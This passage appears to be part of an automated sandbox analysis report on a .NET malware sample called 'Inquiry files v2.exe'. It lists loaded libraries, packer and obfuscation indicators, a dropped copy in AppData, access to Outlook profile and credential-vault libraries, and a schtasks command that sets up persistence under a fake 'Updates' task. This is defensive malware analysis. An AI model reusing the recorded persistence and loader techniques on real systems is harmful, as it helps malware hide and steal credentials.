                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Program Files (x86)\McEirohKWUkqujMrtjMiNZKWqtdmjbsDRNUXeiFWQcvHRUhtEkxQVAZGksndZFPlESH\YIJBuAgnqfKMtZ.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\McEirohKWUkqujMrtjMiNZKWqtdmjbsDRNUXeiFWQcvHRUhtEkxQVAZGksndZFPlESH\YIJBuAgnqfKMtZ.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\McEirohKWUkqujMrtjMiNZKWqtdmjbsDRNUXeiFWQcvHRUhtEkxQVAZGksndZFPlESH\YIJBuAgnqfKMtZ.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\McEirohKWUkqujMrtjMiNZKWqtdmjbsDRNUXeiFWQcvHRUhtEkxQVAZGksndZFPlESH\YIJBuAgnqfKMtZ.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\McEirohKWUkqujMrtjMiNZKWqtdmjbsDRNUXeiFWQcvHRUhtEkxQVAZGksndZFPlESH\YIJBuAgnqfKMtZ.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\McEirohKWUkqujMrtjMiNZKWqtdmjbsDRNUXeiFWQcvHRUhtEkxQVAZGksndZFPlESH\YIJBuAgnqfKMtZ.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\runas.exeSection loaded: credui.dllJump to behavior
                Source: C:\Windows\SysWOW64\runas.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\runas.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\runas.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\runas.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\runas.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\runas.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\runas.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\runas.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\runas.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\runas.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\runas.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\runas.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\runas.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\runas.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\runas.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\runas.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\runas.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\runas.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\runas.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\runas.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\runas.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\runas.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\runas.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\Inquiry files v2.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\Inquiry files v2.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\SysWOW64\runas.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: Inquiry files v2.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: Inquiry files v2.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: runas.pdbGCTL source: RegSvcs.exe, 00000007.00000002.2569895467.0000000000D48000.00000004.00000020.00020000.00000000.sdmp, YIJBuAgnqfKMtZ.exe, 0000000F.00000003.2507786781.000000000159B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: YIJBuAgnqfKMtZ.exe, 0000000F.00000002.3371819645.00000000003EE000.00000002.00000001.01000000.0000000D.sdmp
                Source: Binary string: RegSvcs.pdb, source: YIJBuAgnqfKMtZ.exe, 0000000F.00000002.3378759157.0000000003EEC000.00000004.80000000.00040000.00000000.sdmp, runas.exe, 00000010.00000002.3375891934.00000000052FC000.00000004.10000000.00040000.00000000.sdmp, runas.exe, 00000010.00000002.3372111139.0000000003078000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000013.00000002.3028784720.0000000012D9C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000007.00000002.2570230475.0000000001280000.00000040.00001000.00020000.00000000.sdmp, runas.exe, 00000010.00000002.3374868197.0000000004E6E000.00000040.00001000.00020000.00000000.sdmp, runas.exe, 00000010.00000002.3374868197.0000000004CD0000.00000040.00001000.00020000.00000000.sdmp, runas.exe, 00000010.00000003.2569861761.0000000004973000.00000004.00000020.00020000.00000000.sdmp, runas.exe, 00000010.00000003.2579072541.0000000004B29000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 00000007.00000002.2570230475.0000000001280000.00000040.00001000.00020000.00000000.sdmp, runas.exe, 00000010.00000002.3374868197.0000000004E6E000.00000040.00001000.00020000.00000000.sdmp, runas.exe, 00000010.00000002.3374868197.0000000004CD0000.00000040.00001000.00020000.00000000.sdmp, runas.exe, 00000010.00000003.2569861761.0000000004973000.00000004.00000020.00020000.00000000.sdmp, runas.exe, 00000010.00000003.2579072541.0000000004B29000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: RegSvcs.pdb source: YIJBuAgnqfKMtZ.exe, 0000000F.00000002.3378759157.0000000003EEC000.00000004.80000000.00040000.00000000.sdmp, runas.exe, 00000010.00000002.3375891934.00000000052FC000.00000004.10000000.00040000.00000000.sdmp, runas.exe, 00000010.00000002.3372111139.0000000003078000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000013.00000002.3028784720.0000000012D9C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: runas.pdb source: RegSvcs.exe, 00000007.00000002.2569895467.0000000000D48000.00000004.00000020.00020000.00000000.sdmp, YIJBuAgnqfKMtZ.exe, 0000000F.00000003.2507786781.000000000159B000.00000004.00000020.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                .NET source code contains method to dynamically call methods (often used by packers)
                Source: 0.2.Inquiry files v2.exe.2f9dc88.0.raw.unpack, VU5FiiciHrPuThVwBQ.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                Source: 0.2.Inquiry files v2.exe.7630000.1.raw.unpack, VU5FiiciHrPuThVwBQ.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                Source: 9.2.WOzeoJQi.exe.27bdc94.0.raw.unpack, VU5FiiciHrPuThVwBQ.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                .NET source code contains potential unpacker
                Source: Inquiry files v2.exe, Form1.cs.Net Code: InitializeComponent System.AppDomain.Load(byte[])
                Source: WOzeoJQi.exe.0.dr, Form1.cs.Net Code: InitializeComponent System.AppDomain.Load(byte[])
                Source: 0.2.Inquiry files v2.exe.8020000.3.raw.unpack, dXvfmhcjUU1IvInRn0.cs.Net Code: Rn7eLE9MAq System.Reflection.Assembly.Load(byte[])
                Source: C:\Users\user\Desktop\Inquiry files v2.exeCode function: 0_2_076DB508 pushfd ; ret 0_2_076DB509
                Source: C:\Users\user\Desktop\Inquiry files v2.exeCode function: 0_2_076DB4C3 push esp; ret 0_2_076DB4C9
                Source: C:\Users\user\Desktop\Inquiry files v2.exeCode function: 0_2_076DBDB3 push eax; retf 0_2_076DBDB9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00401851 push ds; iretd 7_2_00401871
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00401A79 pushfd ; retf 7_2_00401A7D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00401AE1 pushfd ; retf 7_2_00401AE5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_004032A0 push eax; ret 7_2_004032A2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0040BB36 push 8DDE865Dh; iretd 7_2_0040BB3E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0042344F push edi; ret 7_2_0042345E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00423453 push edi; ret 7_2_0042345E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0041A505 push ebx; ret 7_2_0041A506
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0040CD17 push es; iretd 7_2_0040CD1A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00405E75 pushfd ; retf 7_2_00405E77
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00401EC6 pushfd ; retf 7_2_00401EC9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0040CFC0 push edi; ret 7_2_0040CFC2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_004147EF push ebx; ret 7_2_004147F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0128225F pushad ; ret 7_2_012827F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012827FA pushad ; ret 7_2_012827F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012B09AD push ecx; mov dword ptr [esp], ecx7_2_012B09B6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0128283D push eax; iretd 7_2_01282858
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0128135E push eax; iretd 7_2_01281369
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeCode function: 9_2_04CBE271 push eax; mov dword ptr [esp], ecx9_2_04CBE284
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeCode function: 9_2_06BEA6DA push es; retf 9_2_06BEA6F8
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeCode function: 9_2_06BEA65F push es; ret 9_2_06BEA660
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeCode function: 9_2_06BEA772 push es; iretd 9_2_06BEA794
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeCode function: 9_2_06BEA4AA push es; ret 9_2_06BEA570
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeCode function: 9_2_06BEA571 push es; ret 9_2_06BEA570
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeCode function: 9_2_06BEA571 push es; iretd 9_2_06BEA61C
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeCode function: 9_2_06BEB159 pushad ; retf 9_2_06BEB165
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeCode function: 9_2_06FCC110 push esp; retf 9_2_06FCC111
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeCode function: 9_2_06FCC884 push 840986CFh; iretd 9_2_06FCC889
                Source: Inquiry files v2.exeStatic PE information: section name: .text entropy: 7.906017390992127
                Source: WOzeoJQi.exe.0.drStatic PE information: section name: .text entropy: 7.906017390992127
                Source: 0.2.Inquiry files v2.exe.2f9dc88.0.raw.unpack, VU5FiiciHrPuThVwBQ.csHigh entropy of concatenated method names: 'fgoCtXMiTS', 'RgtTUJcyZL', 'g6aXCYEDSs', 'eQtXXHpHK1', 'kgQXo5WvMo', 'rl7XDVFHmZ', 'WdR9wPuHuepeI', 'q3Of0ljuF', 'dAnWKSXiW', 'NMlgX8j6G'
                Source: 0.2.Inquiry files v2.exe.2f9dc88.0.raw.unpack, cw37txoRO4X56hm21l.csHigh entropy of concatenated method names: 'X1lG3WCB9', 'Qh3mYfMwF', 'zninSfm9E', 'MDb9Ewmta', 'dHqv0oE1o', 'MvWcl4qrS', 'MXJ1VCDef', 'amJ6pCGsS', 'Iynw5Xgff', 'D1JUO7GYj'
                Source: 0.2.Inquiry files v2.exe.7630000.1.raw.unpack, VU5FiiciHrPuThVwBQ.csHigh entropy of concatenated method names: 'fgoCtXMiTS', 'RgtTUJcyZL', 'g6aXCYEDSs', 'eQtXXHpHK1', 'kgQXo5WvMo', 'rl7XDVFHmZ', 'WdR9wPuHuepeI', 'q3Of0ljuF', 'dAnWKSXiW', 'NMlgX8j6G'
                Source: 0.2.Inquiry files v2.exe.7630000.1.raw.unpack, cw37txoRO4X56hm21l.csHigh entropy of concatenated method names: 'X1lG3WCB9', 'Qh3mYfMwF', 'zninSfm9E', 'MDb9Ewmta', 'dHqv0oE1o', 'MvWcl4qrS', 'MXJ1VCDef', 'amJ6pCGsS', 'Iynw5Xgff', 'D1JUO7GYj'
                Source: 0.2.Inquiry files v2.exe.8020000.3.raw.unpack, bHO0hVaBbLqHYB59vN.csHigh entropy of concatenated method names: 'rKBmjALhNf', 'IbImNQoH9D', 'ys3mL0tEKT', 'OkImEPeg1m', 'R8um5Fri3o', 'jrImC6uULc', 'YdtmA4Xtgm', 'LramqYqAoA', 'zRsm88v1Pv', 'ilHmUyipPq'
                Source: 0.2.Inquiry files v2.exe.8020000.3.raw.unpack, IS9c3f3Pc2goW7gNg9.csHigh entropy of concatenated method names: 'yNxVYbrB1Y', 'DWNVXX6emK', 'ExXV3frbxO', 'DCcVrn7pSt', 'OTlVkWQHhL', 'MMIVf3VxF7', 'wh6V6FpN4w', 'FvCVDn0b5m', 't5oVTvDDoA', 'oHfVgZCi0G'
                Source: 0.2.Inquiry files v2.exe.8020000.3.raw.unpack, AkZEqhH20Mevk819ESy.csHigh entropy of concatenated method names: 'fcAFjaBuJN', 'z7DFNiK7aF', 'JIDFLLENtv', 'lJZr3fMfsEkCnQ6wSe0', 'jPpsYNMt5pM02n3wQSI', 'mc5KGxMkHQXvmOZm6yo', 'N3sr3kM0NxojMlqrWc6', 'SeSSHYMzaoRxhsvvqXU'
                Source: 0.2.Inquiry files v2.exe.8020000.3.raw.unpack, Y29iv6p02IJX0Cn699.csHigh entropy of concatenated method names: 'ToString', 'VFlsBH1e1D', 'haQsky0nRm', 'RamsfJwfj3', 'NNcs6X52oj', 'uQqsDAAy4s', 'sUdsTsBGMv', 'jHesgoy2N0', 'tJVsG7hPlg', 'bB9sa1Ycin'
                Source: 0.2.Inquiry files v2.exe.8020000.3.raw.unpack, O1URIrqBHR6xNO4emT.csHigh entropy of concatenated method names: 'qRGP3hLtbv', 'PfePrALVlE', 'THpPp9pRC5', 'a8pPKfSCcD', 'KeJPt02pCp', 'he1PZbCJKD', 'o4XPvmoTJ7', 'PjRPQ5wCjZ', 'fTcPuaJtNS', 'CyXPI2IOJ0'
                Source: 0.2.Inquiry files v2.exe.8020000.3.raw.unpack, uhHchTPIVrb3N5Aibj.csHigh entropy of concatenated method names: 'Dispose', 'FRRHu0NgPP', 'JBk2kU5TZu', 'TbNhhvyy94', 'VL9HIxxqSC', 'kDIHziA5no', 'ProcessDialogKey', 'xdB2ONUvsH', 'Io32HqpAtj', 'L9222Bljwv'
                Source: 0.2.Inquiry files v2.exe.8020000.3.raw.unpack, Iaw16YkCGRrhvwssRD.csHigh entropy of concatenated method names: 'WXtv7llwi3XHbs1g6j4', 'G1As3Ul3OS8yXTy3Lox', 'CGJMRTAyYq', 'fjcMnZB5eE', 'KZyMFYkGNl', 'zXkVdvlDJbK7tIv6sUQ', 'X23HXklJrOZA005LXjt'
                Source: 0.2.Inquiry files v2.exe.8020000.3.raw.unpack, sQrBoGHOW8sZ4NdJCW6.csHigh entropy of concatenated method names: 'GlxnjyfOf8', 'e1FnN9E9EH', 'gKGnLluL9K', 'AKDnEgKNcS', 'RSyn5FJsdQ', 'pAbnCuhsYJ', 'enUnArXsUJ', 'Wvbnq4c6Kt', 'wVTn8TLJpF', 'g7UnUYSYmU'
                Source: 0.2.Inquiry files v2.exe.8020000.3.raw.unpack, zXWN9WzH8pby7yOLqB.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'wnpnyttvw9', 'gWynVRlGw1', 'wF7nsjv5YR', 'xYenW5KQsZ', 'aIQnR5NHpW', 'PlCnnj7SMU', 'uv6nFGttZ0'
                Source: 0.2.Inquiry files v2.exe.8020000.3.raw.unpack, dXvfmhcjUU1IvInRn0.csHigh entropy of concatenated method names: 'hdQxbsFLwr', 'No9xJy2nbG', 'nmAxPNeC0e', 'cRpxi6Vco7', 'TMkx1TwcDL', 'YYuxMievUe', 'bAMxmDrn9W', 'ltnxc7QaaI', 'WTKx7quNxb', 'eLNx4oT9ih'
                Source: 0.2.Inquiry files v2.exe.8020000.3.raw.unpack, z9xxqSQCcDIiA5no9d.csHigh entropy of concatenated method names: 'TqkRJWeB00', 'mDLRPiSXOi', 'ndpRip5cOb', 'PD8R11WSa5', 'Q0lRMyhNTF', 'd6VRmCOXXt', 'OOGRcOVypU', 'LT8R71UdwW', 'IM3R4q2iDn', 'w1mRdHLXuZ'
                Source: 0.2.Inquiry files v2.exe.8020000.3.raw.unpack, ONUvsHu6o3qpAtjg92.csHigh entropy of concatenated method names: 'PGVRlBGM1r', 'YwWRkaqOgG', 'B5bRfMCTjC', 'ef8R6dArhr', 'pnDR3Xc3TH', 'MwWRDwUCmr', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.Inquiry files v2.exe.8020000.3.raw.unpack, paThBMSOJ76UKWtP6l.csHigh entropy of concatenated method names: 'HFvyq7QLr7', 'gdZy8MX3aR', 'ktUylajRJD', 'igOyklRwLu', 'tKQy6M6PnI', 'DhgyDVs3ni', 'iNHyg0yOmD', 'm0ZyGBXbF9', 'fSLyYTNSCj', 'jIvyB6f4tt'
                Source: 0.2.Inquiry files v2.exe.8020000.3.raw.unpack, em0U7JedTtUKjqHMVv.csHigh entropy of concatenated method names: 'RRBHm1URIr', 'OHRHc6xNO4', 'XadH4vRoD3', 'dE6HdYYphO', 'oNPHV0oyxp', 'wWfHs4hcHk', 'vnYH4kGDNmnclCFUoV', 'ofRUYIOhansnhYUH8Z', 'GG1HHc1b78', 'vKwHxvaiY7'
                Source: 0.2.Inquiry files v2.exe.8020000.3.raw.unpack, DjpZQ1gsO0XPxZHgSH.csHigh entropy of concatenated method names: 'vdZmJarCyj', 'NxamiC1DmC', 'saFmMSJkaC', 'CUtMICfIMZ', 'hqWMz6uwf1', 'aM5mO1mdUB', 'o5SmHTWpfh', 'WInm2HLNbR', 'HF4mxnp84d', 'BC0me0AnAd'
                Source: 0.2.Inquiry files v2.exe.8020000.3.raw.unpack, yQuZju8advRoD3eE6Y.csHigh entropy of concatenated method names: 'pvBiE8IqZH', 'nBriCdWbmK', 'GjbiqQCp4q', 'fpmi8k8Mlv', 'SGRiVb7Ndq', 'jZLis4I90k', 'vUXiWXbfXV', 'V2XiR3nkvL', 'hSWin5l3qq', 'kUSiF2WvUV'
                Source: 0.2.Inquiry files v2.exe.8020000.3.raw.unpack, Oljwv0IDGOkciAFk1i.csHigh entropy of concatenated method names: 'zadnHgxwta', 'Ag4nxHvKeD', 'tJWneyc2Jm', 'GaInJ7sOXI', 'oLWnPdABUF', 'Ynun1mAD0b', 'KqsnMSn8fT', 'XTDRvNs1dB', 'g1yRQQ5xAO', 'Wi8Ruiu2nM'
                Source: 0.2.Inquiry files v2.exe.8020000.3.raw.unpack, nxp0Wfl4hcHkqoxfUr.csHigh entropy of concatenated method names: 'OMpMbV0vBB', 'GUmMPpXhe8', 'CPEM1UBFSy', 'VxMMmiC0W0', 'ODpMchfYno', 'KJY1tlJi1B', 'm301ZgXtbF', 'ISU1vNar6l', 'FAN1QkQbnu', 'Puo1uE1B04'
                Source: 0.2.Inquiry files v2.exe.8020000.3.raw.unpack, KUXFLP2Tf6bu2LcpAl.csHigh entropy of concatenated method names: 'SCtLOVoPO', 'bORE42dN1', 'PvQCxpaup', 'S3rAnwEee', 'L168TstpF', 'ignUTnjcR', 'DAOlBLoLcyRVxtWy8J', 'BiFRYBAcrVdZK4etNy', 'FafREsJpw', 'lNCFOekeX'
                Source: 0.2.Inquiry files v2.exe.8020000.3.raw.unpack, XIcXtJZs5E4qdHiFOc.csHigh entropy of concatenated method names: 'vFyWQgKM9G', 'h7uWIlsqX9', 'NtJRO8pvKn', 'JnJRHiR5cj', 'CO8WB5MOef', 'Up4WXmGAGZ', 'GsrWSKqNUd', 'YDwW3ygmRM', 'AURWr1umB9', 'zxkWpHp0NN'
                Source: 0.2.Inquiry files v2.exe.8020000.3.raw.unpack, NphOiYUtNppdnVNP0o.csHigh entropy of concatenated method names: 'cjg15VRY1R', 'bwv1AkegrP', 'KHUifBW9rX', 'guUi6DIvY1', 'TCoiDbY8DB', 'GQ6iT3ElbF', 'JJwigEEkBY', 'OsqiGvjwyP', 'ukGiatkhTd', 'EmBiYlFFaw'
                Source: 0.2.Inquiry files v2.exe.8020000.3.raw.unpack, yBDYpcHxNcyjRMMUrDE.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Yy7F3oHeKY', 'A2tFrGpYbU', 'q8jFpWZ6WC', 'EFDFK6VEdD', 'QcSFtmcKa6', 'k97FZjsucy', 'kSuFvvtAUm'
                Source: 0.2.Inquiry files v2.exe.8020000.3.raw.unpack, mwg71tKArOF0T47qXV.csHigh entropy of concatenated method names: 'UNMW4Qv3YA', 'D2GWdfCARu', 'ToString', 'UKNWJDNAAB', 'bmNWPG5dtp', 'j5LWiDk5t5', 'fuyW107wyo', 'T5FWMImNP6', 'UV6Wm6VraW', 'Ho7WcxMdEF'
                Source: 9.2.WOzeoJQi.exe.27bdc94.0.raw.unpack, VU5FiiciHrPuThVwBQ.csHigh entropy of concatenated method names: 'fgoCtXMiTS', 'RgtTUJcyZL', 'g6aXCYEDSs', 'eQtXXHpHK1', 'kgQXo5WvMo', 'rl7XDVFHmZ', 'WdR9wPuHuepeI', 'q3Of0ljuF', 'dAnWKSXiW', 'NMlgX8j6G'
                Source: 9.2.WOzeoJQi.exe.27bdc94.0.raw.unpack, cw37txoRO4X56hm21l.csHigh entropy of concatenated method names: 'X1lG3WCB9', 'Qh3mYfMwF', 'zninSfm9E', 'MDb9Ewmta', 'dHqv0oE1o', 'MvWcl4qrS', 'MXJ1VCDef', 'amJ6pCGsS', 'Iynw5Xgff', 'D1JUO7GYj'
                Source: C:\Users\user\Desktop\Inquiry files v2.exeFile created: C:\Users\user\AppData\Roaming\WOzeoJQi.exeJump to dropped file

                Boot Survival

                barindex
                Uses schtasks.exe or at.exe to add and modify task schedules
                Source: C:\Users\user\Desktop\Inquiry files v2.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WOzeoJQi" /XML "C:\Users\user\AppData\Local\Temp\tmp35FF.tmp"

                Hooking and other Techniques for Hiding and Protection

                barindex
                Loading BitLocker PowerShell Module
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Users\user\Desktop\Inquiry files v2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Inquiry files v2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Inquiry files v2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Inquiry files v2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Inquiry files v2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Inquiry files v2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Inquiry files v2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Inquiry files v2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Inquiry files v2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Inquiry files v2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Inquiry files v2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Inquiry files v2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Inquiry files v2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Inquiry files v2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Inquiry files v2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Inquiry files v2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Inquiry files v2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Inquiry files v2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Inquiry files v2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Inquiry files v2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Inquiry files v2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Inquiry files v2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Inquiry files v2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Inquiry files v2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Inquiry files v2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Inquiry files v2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Inquiry files v2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Inquiry files v2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Inquiry files v2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Inquiry files v2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Inquiry files v2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Inquiry files v2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
